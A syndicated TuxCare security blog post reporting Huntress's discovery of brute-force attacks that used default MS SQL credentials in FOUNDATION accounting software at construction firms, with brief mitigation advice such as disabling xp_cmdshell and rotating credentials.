FOUNDATION Breach: Default Credentials Exploited By Hackers
Huntress, a cybersecurity platform, has recently uncovered the FOUNDATION breach in which threat actors are leveraging default credentials. As per media reports, the current targets of these attacks appear to be different providers within the construction sector.
In this article, we’ll cover how hackers are able to conduct these construction sector cyber attacks and what can be done to mitigate the threat. Let’s begin!
Initial Discovery Of The Construction Sector Cyber Attacks
The FOUNDATION breach attacks were initially discovered on September 14th, 2024. At the time, around 35,000 login attempts were recorded against an MS SQL server on a single host before threat actors could gain initial access.
It’s worth mentioning here that the FOUNDATION software was found to be operational on 500 hosts. Out of the 500, public accessibility with default credentials was uncovered for 33 hosts.
FOUNDATION Breach: Cybersecurity Findings
FOUNDATION is an accounting software that comes equipped with Microsoft SQL (MS SQL) Servers. The MS SQL server is primarily used to handle database operations.
However, it allows for the TCP port 4243 to be opened for direct access to the database via mobile app. The cybersecurity firm has stated that they include two accounts that have high-level privileges.
These accounts include “sa,” a system administrator account, and a “dba” account which is created by FOUNDATION. The FOUNDATION breach observations have revealed that both these accounts are left without any modifications being made to the default credentials.
The Brute Force Exploit
Given that these credentials are left unaltered, their chances of falling prey to brute-force attacks on MS SQL servers increase. With such attacks, threat actors can leverage the xp_cmdshell configuration option to run arbitrary shell commands on the targeted victims.
Recent media reports as of now, claim that some of the sectors within construction that are being targeted include Heating, Ventilation, and Air Conditioning (HVAC), concrete, plumbing, and other sub-industries.
Providing further details pertaining to threat actors gaining access and their attack protocols, Huntress has stated that:
“Attackers have been observed brute-forcing the software at scale, and gaining access simply by using the product’s default credentials. This is an extended stored procedure that allows the execution of OS commands directly from SQL, enabling users to run shell commands and scripts as if they had access right from the system command prompt.”
Default Credential Vulnerability Mitigation And Protection
Such cyberthreats pose a significant risk to various industries within the construction sector, and falling prey to them can lead to reputational damages and legal repercussions. To mitigate against such threats organizations must learn to develop a comprehensive cyber security strategy. In addition, they should also:
- Disable the xp_cmdshell option.
- Modify and rotate default account credentials.
- Limit or cease exposure of application over the public internet.
Conclusion
The FOUNDATION breach serves as a stark reminder of the vulnerabilities present in the construction sector. By taking proactive steps to secure default credentials and implementing effective cybersecurity measures, organizations can mitigate risks and protect themselves from future attacks, ensuring that their operations remain secure and reliable.
The sources for this piece include articles in The Hacker News and The Record.
The post FOUNDATION Breach: Default Credentials Exploited By Hackers appeared first on TuxCare.
*** This is a Security Bloggers Network syndicated blog from TuxCare authored by Wajahat Raja. Read the original post at: https://tuxcare.com/blog/foundation-breach-default-credentials-exploited-by-hackers/
